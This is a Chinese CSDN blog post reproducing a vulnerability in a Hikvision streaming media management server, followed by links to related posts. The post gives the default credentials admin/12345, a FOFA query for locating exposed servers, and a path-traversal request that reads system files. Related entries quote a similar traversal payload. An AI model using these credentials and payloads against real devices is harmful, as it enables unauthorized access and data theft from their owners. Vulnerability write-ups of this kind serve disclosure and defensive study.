【漏洞复现】Hikvision流媒体管理服务器后台文件读取漏洞

最新推荐文章于 2024-10-08 15:43:46 发布
最新推荐文章于 2024-10-08 15:43:46 发布
阅读量656 收藏 8
点赞数 9
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135838892
版权
【漏洞复现】 专栏收录该内容
150 篇文章 1 订阅

已下架不支持订阅

本文介绍了海康威视流媒体管理服务器存在的弱口令及文件遍历漏洞,攻击者能利用这些漏洞获取敏感信息。详细步骤包括产品简介、漏洞描述、如何复现漏洞以及修复建议。
摘要由CSDN通过智能技术生成

 Nx01 产品简介

        Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。

Nx02 漏洞描述

        Hikvision流媒体管理服务器存在弱口令漏洞(admin/12345),攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息

Nx03 产品主页

fofa-query: title="流媒体管理服务器"

Nx04 漏洞复现

POC:

/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现Hikvision综合安防管理平台Fastjson命令执行漏洞
晚风不及你
01-23 1252
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
漏洞复现Hikvision流媒体管理服务器信息泄露漏洞
晚风不及你
01-25 803
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
(CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取复现
ximo的博客
03-30 2769
简介 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 漏洞说明 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 漏洞复现 Fofa搜索标题: title="流媒体管理服务器" 找到存在弱口令的后台: admin/12345 在日志下载中进行抓包: 构造payload: ../../../../../../../windows/system32/drivers/etc/hosts 可进行下载。 ...
漏洞复现Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 1890
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
漏洞复现Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 4443
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
HIKVISION流媒体管理服务器后台任意文件读取漏洞
梦里明明有六趣,觉后空空无大千
11-11 296
各家兴便是天下大同
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 6857
海康威视越权访问CVE-2021-7921漏洞复现
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
最新发布
菜鸟学渗透
10-08 506
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
Hikvision:海康威视海康威视流媒体管理服务器任意文件读取
03-28
海康威视 海康威视海康威视流媒体管理服务器任意文件读取 #USE python3 CNVD-2021-14544.py ip.txt放置在本脚本目录下
漏洞复现Hikvision综合安防管理平台任意文件读取漏洞
晚风不及你
01-22 2227
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
HiKVISION 综合安防管理平台 env信息泄漏漏洞,2024年最新网络安全源码剖析之Framwork层消息传递
2301_76225520的博客
04-13 837
Hikvision是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 6388
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
漏洞复现Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)
做自己喜欢的事,并将其发挥到极致!
01-19 1260
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
漏洞复现Hikvision综合安防管理平台env信息泄漏漏洞
晚风不及你
01-21 2399
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
探索安全边界:Hikvision摄像机远程命令注入漏洞利用工具深度解析
gitblog_00070的博客
05-29 681
探索安全边界:Hikvision摄像机远程命令注入漏洞利用工具深度解析 去发现同类优质开源项目:https://gitcode.com/ 项目简介 随着网络摄像头在监控领域的广泛应用,其安全性成为不可忽视的重要环节。CVE-2021-36260是一个针对特定型号Hikvision网络摄像机的命令注入漏洞示例。本开源项目由bashis贡献,提供了PoC代码,演示了如何通过未充分验证的输入,在指定版本...
漏洞复现Hikvision综合安防管理平台config信息泄露漏洞
晚风不及你
01-21 2587
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视漏洞综合利用工具-HikvisionExploitGUI
siu~
05-10 3648
海康威视漏洞综合利用工具,支持一键上传哥斯拉等多种利用方式
海康威视对讲广播系统 RCE漏洞复现(CVE-2023-6895)
0xSec
12-20 1583
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
海康威视漏洞合集
weixin_46626737的博客
07-03 4758
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc。漏洞版本:大多数设备。
HIKVISION流媒体SDK开发与应用指南
3. `StartServer`:初始化服务端,指定流媒体文件的目录路径和监听端口,默认端口为554,成功返回0,失败返回-1。 4. `RunServer`:运行服务端处理线程,开始接收和处理客户端请求,立即返回,成功返回0,失败返回-1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值